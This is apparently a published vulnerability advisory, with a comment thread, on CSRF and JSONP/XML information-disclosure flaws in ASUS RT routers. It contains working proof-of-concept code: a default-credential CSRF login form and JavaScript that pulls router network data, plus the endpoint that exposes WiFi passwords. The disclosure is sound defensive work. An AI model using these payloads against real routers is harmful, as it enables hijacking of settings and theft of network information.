Summary
Various models of ASUS RT routers have several CSRF vulnerabilities allowing malicious sites to login and change settings in the router; multiple JSONP vulnerabilities allowing exfiltration of router data and an XML endpoint revealing WiFi passwords.
Most of these issues have been fixed by Asus in the March 2017 firmware update under v3.0.0.4.380.7378. One issue (JSONP information disclosure – CVE-2017-5892) remains unfixed since the vendor doesn’t consider it to be a security threat [UPDATE: Asus will be fixing this]
CVE-2017-5891 has been assigned to the CSRF issues, and CVE-2017-5892 to cover the JSONP disclosure without login issue. [ADDED 05/11/2017: Two additional CVEs have been issued to cover JSONP issues after login – CVE-2017-8877 – and the XML information disclosure issue – CVE-2017-8878].
[ADDED 05/28/2017: As reported in comments below, multiple other models may be affected; please review the list below for details on what is affected, and whether patches are available]
Vulnerability Details
RT routers from ASUS like many other routers come with a built-in web interface accessible over the local network but normally not accessible via the Internet. We discovered multiple issues within that web interface that would can facilitate attacks on the router either via a malicious site visited by a user on the same network, or a malicious mobile or desktop application running on the same network.
For the CSRF vulnerabilities, a user would need to visit a malicious site which can try to login and change settings. For the JSONP vulnerabilities, a website can load the JSONP endpoints via SCRIPT tags as long as matching function name is defined on that site. The XML endpoint requires a mobile or desktop application to exploit.
NOTE: all of these assume that the attacker knows the local IP address of the router. This could probably be guessed or be determined via Javascript APIs like WebRTC. For desktop and mobile applications, determination of the gateway address should be trivial to implement.
Issue #1 – Login Page CSRF (CVE-2017-5891)
The login page for the router doesn’t have any kind of CSRF protection, thus allowing a malicious website to submit a login request to the router without the user’s knowledge. Obviously, this only works if the site either knows the username and password of the router OR the user hasn’t changed the default credentials (“admin / admin”). To exploit, submit the base-64 encoded username and password as “login_authorization” form post, to the “/login.cgi” URL of the browser.
Example of a form that can exploit this issue (uses default credentials):
<form action="http://192.168.1.1/login.cgi" method="post" target="_blank"> <input name="login_authorization" type="text" value="YWRtaW46YWRtaW4=" /> <input type="submit" /></form>
Issue #2 – Save Settings CSRF (CVE-2017-5891)
The various pages within the interface that can save settings do not have CSRF protection. That means that a malicious site, once logged in as described above would be able to change any settings in the router without the user’s knowledge.
NOTE: We have not been to exploit this issue consistently
Issue #3 – JSONP Information Disclosure Without Login (CVE-2017-8877)
Two JSONP endpoints exist within the router which allow detection of which ASUS router is running and some information disclosure. No login is required to the router. The vendor doesn’t consider these endpoints a security threat. [ADDED 05/11/2017: A project named Sonar.JS exists on Github that describes how to use this with WebRTC to figure out which router the user is running, This project is an example of what is possible with an end point like this one].
The endpoints are as follows:
- /findasus.json
- Returns the router model name, SSID name and the local IP address of the router
- iAmAlive([{model?Name: “XXX”, ssid: “YYY”, ipAddr: “ZZZZ”}])
- Returns the router model name, SSID name and the local IP address of the router
- /httpd_check.json
- Returns: {“alive”: 1, “isdomain”: 0}
Exploit code as follows:
function iAmAlive(payload) {
window.alert("Result returned: " + JSON.stringify(payload));
}
function alert1() {
var script = document.createElement('script');
script.src = 'http://192.168.1.1/findasus.json'
document.getElementsByTagName('head')[0].appendChild(script);
}
function alert2() {
var script = document.createElement('script');
script.src = 'http://192.168.1.1/httpd_check.json'
document.getElementsByTagName('head')[0].appendChild(script);
}
Issue #4 – JSONP Information Disclosure, Login Required (CVE-2017-5892)
There exist multiple JSONP endpoints within the router interface that reveal various data from the router including.
Below is a list of endpoints and exploit code:
/status.asp – Network Information
function getstatus() {
var script = document.createElement('script');
script.src = 'http://192.168.1.1/status.asp'
document.getElementsByTagName('head')[0].appendChild(script);
}
function show_wanlink_info() {
var obj = {};
obj.status = wanlink_status();
obj.statusstr = wanlink_statusstr();
obj.wanlink_type = wanlink_type();
obj.wanlink_ipaddr = wanlink_ipaddr();
obj.wanlink_xdns = wanlink_xdns();
window.alert(JSON.stringify(obj));
}
<br/>
<button onClick="getstatus()">Load Status script</button>
<button onClick="show_wanlink_info()">Show wanlink info</button>
<br/><br/>
/wds_aplist_2g.asp – Surrounding Access points, 2.4 Ghz band
/wds_aplist_5g.asp – Surrounding Access points, 5 Ghz band
function getwds_2g() {
var script = document.createElement('script');
script.src = 'http://192.168.1.1/wds_aplist_2g.asp'
document.getElementsByTagName('head')[0].appendChild(script);
}
function getwds_5g() {
var script = document.createElement('script');
script.src = 'http://192.168.1.1/wds_aplist_5g.asp'
document.getElementsByTagName('head')[0].appendChild(script);
}
<br/>
<button onClick="getwds_2g()">Load 2G info</button>
<button onClick="getwds_5g()">Load 5G info</button>
<button onClick="window.alert(JSON.stringify(wds_aplist))">Show AP info</button>
<br/><br/>
/update_networkmapd.asp – Network map of devices on the network
function getmap() {
var script = document.createElement('script');
script.src = 'http://192.168.1.1/update_networkmapd.asp'
document.getElementsByTagName('head')[0].appendChild(script);
}
<br/>
<button onClick="getmap()">Load Network map</button>
<button onClick="window.alert(JSON.stringify(fromNetworkmapd))">Show Map</button>
<br/><br/>
/update_clients.asp – Origin data
function getorigin() {
originData = [];
var script = document.createElement('script');
script.src = 'http://192.168.1.1/update_clients.asp'
document.getElementsByTagName('head')[0].appendChild(script);
}
<br/>
<button onClick="getorigin()">Load Origin</button>
<button onClick="window.alert(JSON.stringify(originData))">Show Origin</button>
/get_real_ip.asp – External IP address
function getrealip() {
var script = document.createElement('script');
script.src = 'http://192.168.1.1/get_real_ip.asp'
document.getElementsByTagName('head')[0].appendChild(script);
}
<br/>
<button onClick="getrealip()">Load IP</button>
<button onClick="window.alert(JSON.stringify(wan0_realip_ip))">Show IP</button>
/get_webdavInfo.asp – WebDAV information
function getwebdav() {
var script = document.createElement('script');
script.src = 'http://192.168.1.1/get_webdavInfo.asp';
document.getElementsByTagName('head')[0].appendChild(script);
}
<br/>
<button onClick="getwebdav()">Load WebDav</button>
<button onClick="window.alert(JSON.stringify(pktInfo))">Show Info 1</button>
<button onClick="window.alert(JSON.stringify(webdavInfo))">Show Info 1</button>
<br/><br/>
Issue #5 – XML Endpoint Reveals WiFi Passwords (CVE-2017-8878)
An XML endpoint exists in the router which reveals the WiFi password to the router but to fully exploit this issue, it would require a mobile or desktop application running on the local network since XML cannot be loaded cross origin in the browser. This endpoint can be accessed at the following URL and requires login:
[router IP]/WPS_info.xml
Mitigation Steps / Vendor Response
Users should change the default credentials and apply the latest firmware released by ASUS, version v3.0.0.4.380.7378 or higher (except for 4G-AC55U which has no patches available).
There is no mitigation available for the issue #3 – JSONP information disclosure without login.
Affected models include the following ASUS routers and is not exhaustive:
- 4G-AC55U – [ADDED 05/10/2017, patches are available as of 06/13/2017]
- RT-AC51U
- RT-AC52U B1 – [ADDED 05/10/2017 based on Asus Firmware updates]
- RT-AC53 – [ADDED 05/10/2017 based on Asus Firmware updates]
- RT-AC53U
- RT-AC55U
- RT-AC56R
- RT-AC56S
- RT-AC56U
- RT-AC58U – [ADDED 05/28/2017: As reported by a commenter below, this one is also affected] [ADDED 06/15/2017 – firmware update now available]
- RT-AC66U
- RT-AC68U
- RT-AC68UF – [ADDED 05/10/2017 based on Asus Firmware updates]
- RT-AC66R
- RT-AC66U
- RT-AC66W
- RT-AC68W
- RT-AC68P
- RT-AC68R
- RT-AC68U
- RT-AC87R
- RT-AC87U
- RT-AC88U – [ADDED 05/10/2017 based on Asus Firmware updates]
- RT-AC1200 – [ADDED 05/10/2017 based on Asus Firmware updates]
- RT-AC1750 – [ADDED 05/10/2017 based on Asus Firmware updates]
- RT-AC1900P
- RT-AC3100
- RT-AC3200
- RT-AC5300
- RT-AC1200G+ – [ADDED 06/15/2017: based on a comment below]
- RT-ACRH13 – [ADDED 05/28/2017: As reported by a commenter below, this one is also affected and has no patches]
- RT-N11P
- RT-N12 (D1 version only)
- RT-N12+
- RT-N12E
- RT-N16 – [ADDED 05/10/2017 based on Asus Firmware updates]
- RT-N18U
- RT-N56U
- RT-N66R – [07/20/2017 – as per commenter below, new firmware was released on July 17th, 2017 – v3.0.0.4.380.7743]
- RT-N66U (B1 version only)
- RT-N66W
- RT-N300 – [ADDED 05/10/2017 based on Asus Firmware updates]
- RT-N600 – [ADDED 05/10/2017 based on Asus Firmware updates]
References
CVE-IDs: CVE-2017-5891, CVE-2017-5892, CVE-2017-8877 and CVE-2017-8878
CERT/CC Tracking # VR-627
Credits
We would like to thank CERT/CC for helping to coordinate the disclosure process. This advisory was written by Yakov Shafranovich.
Timeline
2017-01-21: Initial contact with the vendor
2017-01-23: Initial contact with CERT/CC
2017-02-05: Vulnerability details and POC code provided to the vendor, CVEs requested
2017-02-10: Vulnerability analysis received from the vendor
2017-02-12: Beta firmware provided by the firmware to test fixes
2017-02-12: Vendor fixes confirmed
2017-03-31: Fixed firmware released publicly by the vendor
2017-05-01: Draft advisory shared with the vendor and CERT/CC
2017-05-09: Public disclosure
Nightwatch Cybersecurity 
The Asus 4G-AC55U router is also affected by the issues listed in the article but it did not receive a firmware fix.
The router is based on the same AsusWRT firmware as the RT series, just has a 4G LTE modem built in. The latest version 3.0.0.4.378.8150 was published a year ago on 2016-05-20 on the download page at https://www.asus.com/Networking/4G-AC55U/HelpDesk_Download/.
I tested all the vulnerabilities listed above and can confirm they are present.
Please update the article to warn the 4G-AC55U owners and pass this information to the vendor if possible.
We will take a look and update accordingly. Thank you for the information.
The JSONP Information Disclosure looks more like Cross-Site Script Inclusion (XSSI) as the URLs do not accept a user supplied callback parameter.
[…] This has been published here. […]
RT-N56U last firmware update was 1/12/2017 as ver. 3.0.0.4.376.3754
but im running ver. 3.0.0.4.378_4850 (more current than official?)
wondering if im hacked?
Not sure, sounds like it needs to be higher than v3.0.0.4.380.7378 and yours isn’t
Can I assume the T-Mobile version of the RT-AC1900 is also affected – TM-AC1900? Its firmware remains at stuck at an earlier version.
We don’t know about the TM-AC19000
I’ve been using Merlin’s alternative firmware for over a year with zero issues… https://asuswrt.lostrealm.ca. He’s more interested in keeping things patched while only adding additional tweaks to the existing software. He doesn’t worry about trying to add new modules.
I changed the SSL port on my RT-AC1900P to 8443. I tried to login using the standard HTTP:80 combo, and the router identifies itself as RT-N66U. The page shouldn’t resolve at all, but it seems the firmware has another flaw. Furthermore, the page will only render with Chrome on Windows 10 (1703). Firefox, IE, Edge show a connection error. A connection error is displayed via Chrome/Safari/Firefox from macOS as well. The ASUSRouter iOS app will no longer connect to the router, which could be a separate issue. Hopefully there is no vulnerabilities with this configuration. Can anyone confirm?
An authenticated session is not required to exploit the `/status.asp` XSSI information disclosure on Asus RT-N12E routers.
The RT-N12E also exposes a `/get_wan_status.asp` file which discloses information such as the MAC addresses and IP addresses of client machines on the LAN.
Here’s a BeEF module which exploits these issues:
https://github.com/beefproject/beef/tree/master/modules/exploits/router/asus_rt_n12e_get_info
Hey @nightwatchcyber
Add this one to the list as well, RT-AC58U (or in the U.S. (and maybe other markets): RT-ACRH13).
Verified manually with the CVE details and exploit code you have available, and the firmware version is also lower than the referenced 3.0.0.4.380_6516, no newer one is available as of yet.
Update: I’ve contacted ASUS support via email, and they’ve informed me that there’s no ETA for the availability of a new firmware to fix this issues on this device (RT-AC58U/RT-ACRH13)
Update: ASUS has released an update for the RT-AC58U. Should have the fixes implemented.
ASUS RT-AC58U Firmware version 3.0.0.4.380.7485
Add
– Tx power adjust option
– New Zealand ISP support
– IPTV – HiNet MOD profile
– Reboot Schedule support
Optimization
– Wireless 5GHz band performance
– Wired performance in AP mode
– Reduce system RAM usage
– The max number of client connections
Bug Fixes
– Fixed system crash issue
Please unzip the firmware file first then check the MD5 code.
MD5: 71e06b665f988359a8b5f05c9bd00fbd
Does this include the fixes for these issues?
I believe it should, haven’t tested all yet. But the CVE-2017-5891 goes to the login page instead of logging in, so I’d say yes.
Updated my RT-N16 to firmware ver. 3.0.0.4.380_7378 and can no longer get ports to negotiate a gigabit connection. ASUS support solution is to revert back. Heard of anyone else having this issue?
4G-AC55U has now new version of the firmware (3.0.0.4.380.7633). It should include fixes to the security problems.
RT-AC1200G+ is affected.
Ane there is no firmware update
ASUS RT-N66R Firmware version 3.0.0.4.380.7743 (July 17, 2017)
Security fixed
– Fixed CVE-2017-5892 (JSONP Information Disclosure)
(among others)
[…] weekend, we had a talk at BSides DC about hacking ASUS routers. The original blog post is here, slides for the talk can be found here, video can be found here (starting at the 3 hour […]
Hi,
Issue #3 – JSONP Information Disclosure Without Login (CVE-2017-5892)
Issue #4 – JSONP Information Disclosure, Login Required (CVE-2017-8877)
About above vulnerability, is there any typo about the CVE id?
I have double check the pdf from below link:
Click to access bsides_fall_2017.pdf
Looks like,
Issue #3 – JSONP Information Disclosure Without Login (CVE-2017-5892)
– CVE should be CVE-2017-8877?
Issue #4 – JSONP Information Disclosure, Login Required (CVE-2017-8877)
– CVE should be CVE-2017-5892?
Regards.
We corrected that, thank you